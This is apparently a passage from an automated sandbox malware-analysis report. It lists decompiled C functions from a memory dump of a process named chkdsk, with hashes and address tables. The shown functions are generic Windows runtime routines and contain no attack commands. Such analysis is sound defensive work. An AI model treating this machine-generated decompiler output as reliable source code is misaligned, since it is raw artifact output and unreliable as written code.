                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a09dea2038fbeeec0ec3c604ca1fc8961cf2daec48df4f938cfb766cc550c7e7
                                                      • Instruction ID: 831a5a3a76b88dc12bf48f4cf69d038a5bec6b465e907d9613db7daafc9606dc
                                                      • Opcode Fuzzy Hash: a09dea2038fbeeec0ec3c604ca1fc8961cf2daec48df4f938cfb766cc550c7e7
                                                      • Instruction Fuzzy Hash: 76318D71A05301DFE360DF19C800BA6B7E5FB88B00F05496DE9999B351E7B0F804CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D8AA16 Relevance: .1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 95%
                                                      			E04D8AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x4e7d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x4e77b9c; // 0x0
					_t53 = L04DA4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E04DCB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E04DCF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L04D96C59(_t53, _t51, _t58) != 0) {
							_t28 = E04DB5E50(0x4d6c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E04DBB230(_v32, _v28, 0x4d6c2d8, 1,  &_v24);
								_t28 = E04D8F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                      0x04d8aa25
                                                      0x04d8aa29
                                                      0x04d8aa2d
                                                      0x04d8aa30
                                                      0x04d8aa37
                                                      0x04d8aa3c
                                                      0x04de4458
                                                      0x04de4458
                                                      0x04de4472
                                                      0x04de4474
                                                      0x04de4476
                                                      0x04d8aa64
                                                      0x04d8aa74
                                                      0x04de447c
                                                      0x04de4483
                                                      0x04de4492
                                                      0x04d8aa52
                                                      0x04d8aa54
                                                      0x04d8aa5e
                                                      0x04de44a8
                                                      0x04de44ad
                                                      0x04de44af
                                                      0x04de44b6
                                                      0x04de44b6
                                                      0x04de44b9
                                                      0x04de44bc
                                                      0x04de44cd
                                                      0x04de44d3
                                                      0x04de44d6
                                                      0x04de44e1
                                                      0x04de44e1
                                                      0x04de44e6
                                                      0x04de44e8
                                                      0x04de44fb
                                                      0x04de44fb
                                                      0x04de44e8
                                                      0x00000000
                                                      0x04d8aa5e
                                                      0x04de4476
                                                      0x04d8aa42
                                                      0x04d8aa46
                                                      0x04d8aa48
                                                      0x04d8aa4c
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3a3b263e064067ed5d946a379865f25c6166aadd4d707c59929e0c68da3be419
                                                      • Instruction ID: b98c7df98e8e5bf19d2a463d89be6928ce4b96be1af4eaeb1325a87b52c369e1
                                                      • Opcode Fuzzy Hash: 3a3b263e064067ed5d946a379865f25c6166aadd4d707c59929e0c68da3be419
                                                      • Instruction Fuzzy Hash: 53319F71A00219ABDB11AF65CD41ABEB7B9FF04704B01406AF941EB250E778BD11DBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DC8EC7 Relevance: .1, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 93%
                                                      			E04DC8EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x4e7d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E04DB4E70(0x4e786e4, 0x4dc9490, 0, 0);
					if( *0x4e753e8 > 5 && E04DC8F33(0x4e753e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x4e753e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x4e753e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x4d6bc46;
						_t48 = E04E07B9C(0x4e753e8, 0x4d6bc46, _t67, 0x4e753e8, _t70,  &_v140);
					}
				}
				return E04DCB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                                      0x04dc8ec7
                                                      0x04dc8ed9
                                                      0x04dc8edc
                                                      0x04dc8ee6
                                                      0x04dc8ee9
                                                      0x04dc8eee
                                                      0x04dc8efc
                                                      0x04dc8f08
                                                      0x04e01349
                                                      0x04e01353
                                                      0x04e0135d
                                                      0x04e01366
                                                      0x04e0136f
                                                      0x04e01375
                                                      0x04e0137c
                                                      0x04e01385
                                                      0x04e01390
                                                      0x04e01391
                                                      0x04e0139c
                                                      0x04e0139d
                                                      0x04e013a6
                                                      0x04e013ac
                                                      0x04e013b2
                                                      0x04e013b5
                                                      0x04e013bc
                                                      0x04e013bf
                                                      0x04e013c2
                                                      0x04e013c5
                                                      0x04e013c8
                                                      0x04e013cb
                                                      0x04e013ce
                                                      0x04e013d1
                                                      0x04e013d4
                                                      0x04e013d7
                                                      0x04e013da
                                                      0x04e013dd
                                                      0x04e013e0
                                                      0x04e013e3
                                                      0x04e013e6
                                                      0x04e013e9
                                                      0x04e013f6
                                                      0x04e01400
                                                      0x04e01400
                                                      0x04dc8f08
                                                      0x04dc8f32

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e3b021f69292121dd8d78427446054bcc99df7d09398686a5c41b5cb7e31d656
                                                      • Instruction ID: 78f0504fda2c128a8f42661b8716e57ef8e1cd4b2904cf53c670ebee97d0efbc
                                                      • Opcode Fuzzy Hash: e3b021f69292121dd8d78427446054bcc99df7d09398686a5c41b5cb7e31d656
                                                      • Instruction Fuzzy Hash: 3441B2B1D00219AFDB10CFAAD981AADFBF4FB48314F5041AEE549A7240D774AA84CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DC4A2C Relevance: .1, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E04DC4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x4e7d360 ^ _t62;
				_v8 =  *0x4e7d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E04DA2280(_t26, 0x4e78608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E04D9FFB0(_t41, _t51, 0x4e78608);
						L2:
						 *0x4e7b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E04DCB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E04DA2280(_t28, 0x4e78608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E04D9FFB0(_t42, _t53, 0x4e78608);
							if(_t53 != 0) {
								L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E04D9FFB0(_t41, _t51, 0x4e78608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                                      0x04dc4a2c
                                                      0x04dc4a34
                                                      0x04dc4a3c
                                                      0x04dc4a3e
                                                      0x04dc4a48
                                                      0x04dc4a4b
                                                      0x04dc4a4d
                                                      0x04dc4a51
                                                      0x04dc4a9c
                                                      0x00000000
                                                      0x00000000
                                                      0x04dc4aa3
                                                      0x04dc4aa8
                                                      0x04dc4aad
                                                      0x04dc4ab1
                                                      0x04dc4ade
                                                      0x04dc4ae3
                                                      0x04dc4a5a
                                                      0x04dc4a62
                                                      0x04dc4a6a
                                                      0x04dc4a6e
                                                      0x04dff203
                                                      0x04dc4a84
                                                      0x04dc4a88
                                                      0x04dc4a89
                                                      0x04dc4a8a
                                                      0x04dc4a95
                                                      0x04dc4a95
                                                      0x04dc4a79
                                                      0x04dc4a80
                                                      0x04dc4af2
                                                      0x04dc4af4
                                                      0x04dc4af9
                                                      0x04dc4aff
                                                      0x04dc4b01
                                                      0x04dc4b03
                                                      0x04dc4b08
                                                      0x04dff20a
                                                      0x04dff212
                                                      0x04dff216
                                                      0x04dff216
                                                      0x04dc4b08
                                                      0x04dc4b13
                                                      0x04dc4b1a
                                                      0x04dff229
                                                      0x04dff229
                                                      0x04dc4b1a
                                                      0x04dc4a82
                                                      0x00000000
                                                      0x04dc4a82
                                                      0x04dc4ab7
                                                      0x04dc4acd
                                                      0x04dc4acd
                                                      0x04dc4ad5
                                                      0x04dc4ada
                                                      0x00000000
                                                      0x04dc4ada
                                                      0x04dc4ac2
                                                      0x04dc4acb
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04dc4acb
                                                      0x04dc4a53
                                                      0x04dc4a53
                                                      0x04dc4a58
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f8a8c05b0944bfbe630d85d09aaadb9b814626d472a62a625b23d78d839652e7
                                                      • Instruction ID: 71756522b2cfc2a6cf77a18b97ca3ec4787990452f6ae088e0334ec3a68244d3
                                                      • Opcode Fuzzy Hash: f8a8c05b0944bfbe630d85d09aaadb9b814626d472a62a625b23d78d839652e7
                                                      • Instruction Fuzzy Hash: D8310232301612EBD721EF54C984B2AB7A4FF80B18F05092EE9568B240D770F804CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DBE730 Relevance: .1, Instructions: 89COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 74%
                                                      			E04DBE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E04DC9670() < 0) {
					L04DDDF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x4e77b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L04DA4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M04DBE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                                      0x04dbe730
                                                      0x04dbe736
                                                      0x04dbe738
                                                      0x04dbe73d
                                                      0x04dbe73e
                                                      0x04dbe740
                                                      0x04dbe749
                                                      0x04dbe765
                                                      0x04dbe76a
                                                      0x04dbe76b
                                                      0x04dbe76c
                                                      0x04dbe76d
                                                      0x04dbe76e
                                                      0x04dbe76f
                                                      0x04dbe775
                                                      0x04dbe777
                                                      0x04dbe77e
                                                      0x04dfb675
                                                      0x04dbe784
                                                      0x04dbe784
                                                      0x04dbe789
                                                      0x04dbe7a8
                                                      0x04dbe7ac
                                                      0x04dbe807
                                                      0x04dbe7ae
                                                      0x04dbe7ae
                                                      0x04dbe7b1
                                                      0x04dbe7b4
                                                      0x04dbe7b9
                                                      0x04dbe7c0
                                                      0x04dbe7c4
                                                      0x04dbe7ca
                                                      0x04dbe7cc
                                                      0x00000000
                                                      0x04dbe7d3
                                                      0x04dbe7d6
                                                      0x00000000
                                                      0x00000000
                                                      0x04dbe7ff
                                                      0x04dbe802
                                                      0x00000000
                                                      0x00000000
                                                      0x04dbe7f9
                                                      0x04dbe7fc
                                                      0x00000000
                                                      0x00000000
                                                      0x04dbe7f3
                                                      0x04dbe7f6
                                                      0x00000000
                                                      0x00000000
                                                      0x04dbe7ed
                                                      0x04dbe7f0
                                                      0x00000000
                                                      0x00000000
                                                      0x04dbe7e7
                                                      0x04dbe7ea
                                                      0x00000000
                                                      0x00000000
                                                      0x04dfb685
                                                      0x04dfb688
                                                      0x00000000
                                                      0x00000000
                                                      0x04dfb682
                                                      0x00000000
                                                      0x00000000
                                                      0x04dbe7cc
                                                      0x04dbe7d9
                                                      0x04dbe7dc
                                                      0x04dbe7de
                                                      0x04dbe7de
                                                      0x04dbe7ac
                                                      0x04dbe7e4
                                                      0x04dbe74b
                                                      0x04dbe751
                                                      0x04dbe759
                                                      0x04dbe761
                                                      0x04dbe761

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d658e88b76cd3fed24fc421292526c85b5177b30314b9ebb66188d9457265f50
                                                      • Instruction ID: 9f0bf13e775430e6efbe01615d4bed2a9ab3cd7b8a98469d35792257f5ab73e1
                                                      • Opcode Fuzzy Hash: d658e88b76cd3fed24fc421292526c85b5177b30314b9ebb66188d9457265f50
                                                      • Instruction Fuzzy Hash: F8318CB5A14249EFD704CF28D841B9AB7E8FB08314F14829AF945CB341E631EC80CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DBBC2C Relevance: .1, Instructions: 88COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 67%
                                                      			E04DBBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x4e76100; // 0x8
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E04DA2280(0xd, 0x1884f1a0);
				_t41 =  *0x4e760f8; // 0x0
				if(_t41 != 0) {
					 *0x4e760f8 =  *_t41;
					 *0x4e760fc =  *0x4e760fc + 0xffff;
				}
				E04D9FFB0(_t41, 0x800, 0x1884f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x4e760f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L04DA4620(0x4e76100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x4e76100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                                      0x04dbbc36
                                                      0x04dbbc42
                                                      0x04dbbc45
                                                      0x04dbbc4a
                                                      0x04dbbd35
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04dbbc50
                                                      0x04dbbc50
                                                      0x04dbbc58
                                                      0x04dbbc5a
                                                      0x04dbbc60
                                                      0x00000000
                                                      0x00000000
                                                      0x04dfa4f2
                                                      0x04dfa4f6
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04dfa4fc
                                                      0x04dbbc79
                                                      0x04dbbc7e
                                                      0x04dbbc86
                                                      0x04dbbd16
                                                      0x04dbbd20
                                                      0x04dbbd20
                                                      0x04dbbc8d
                                                      0x04dbbc94
                                                      0x04dbbcbd
                                                      0x04dbbcca
                                                      0x04dbbccb
                                                      0x04dbbccc
                                                      0x04dbbccd
                                                      0x04dbbcce
                                                      0x04dbbcd4
                                                      0x04dbbcea
                                                      0x04dbbcee
                                                      0x04dbbcf2
                                                      0x04dbbd00
                                                      0x04dbbd04
                                                      0x00000000
                                                      0x04dbbc96
                                                      0x04dbbcab
                                                      0x04dbbcaf
                                                      0x04dbbd2c
                                                      0x04dbbd2c
                                                      0x04dbbd09
                                                      0x00000000
                                                      0x04dbbd09
                                                      0x04dbbcb1
                                                      0x04dbbcb5
                                                      0x04dbbcbb
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04dbbcbb

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5c4d6a12a3947db679a9ed006bde1f8595d7920de111fce1e9e8f376d2674ce7
                                                      • Instruction ID: f10814e9da9bb269c514ae861361703d07501540cb0857d63fdb131161a1b65c
                                                      • Opcode Fuzzy Hash: 5c4d6a12a3947db679a9ed006bde1f8595d7920de111fce1e9e8f376d2674ce7
                                                      • Instruction Fuzzy Hash: EE31DF32A00A15DBDB11DF69D4807E673A4FB18329F04457AE98AEB605E778FD058BD0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DB1DB5 Relevance: .1, Instructions: 87COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 60%
                                                      			E04DB1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E04DAF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L04DA4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E04DAF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                                      0x04db1dc2
                                                      0x04db1dc5
                                                      0x04db1dc7
                                                      0x04db1dcc
                                                      0x04db1dce
                                                      0x04db1dd6
                                                      0x04db1ddf
                                                      0x04db1de0
                                                      0x04db1de1
                                                      0x04db1de5
                                                      0x04db1de8
                                                      0x04db1def
                                                      0x04db1df0
                                                      0x04db1df6
                                                      0x04db1df7
                                                      0x04db1dfe
                                                      0x04db1e1a
                                                      0x00000000
                                                      0x00000000
                                                      0x04db1e0b
                                                      0x04db1e12
                                                      0x04db1e12
                                                      0x04db1e00
                                                      0x04db1e00
                                                      0x04db1e05
                                                      0x04db1e1e
                                                      0x04db1e23
                                                      0x04df570f
                                                      0x04df5713
                                                      0x00000000
                                                      0x00000000
                                                      0x04df5719
                                                      0x04df5719
                                                      0x04db1e2c
                                                      0x04db1e2d
                                                      0x04db1e2e
                                                      0x04db1e2f
                                                      0x04db1e31
                                                      0x04db1e32
                                                      0x04db1e35
                                                      0x04db1e3d
                                                      0x04df5723
                                                      0x04df573d
                                                      0x04df573d
                                                      0x00000000
                                                      0x04df5723
                                                      0x04db1e49
                                                      0x04db1e4e
                                                      0x04db1e4e
                                                      0x04db1e09
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                      • Instruction ID: 78fa7d40dc2f2f6df0ce23ea3cd54d7c60f902c281ba068a13194408388d2d1b
                                                      • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                      • Instruction Fuzzy Hash: B1218B32A00119EFD721CF99CCA4EAEBBB9FF85684F154059E94297210DA30BE11CBE0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

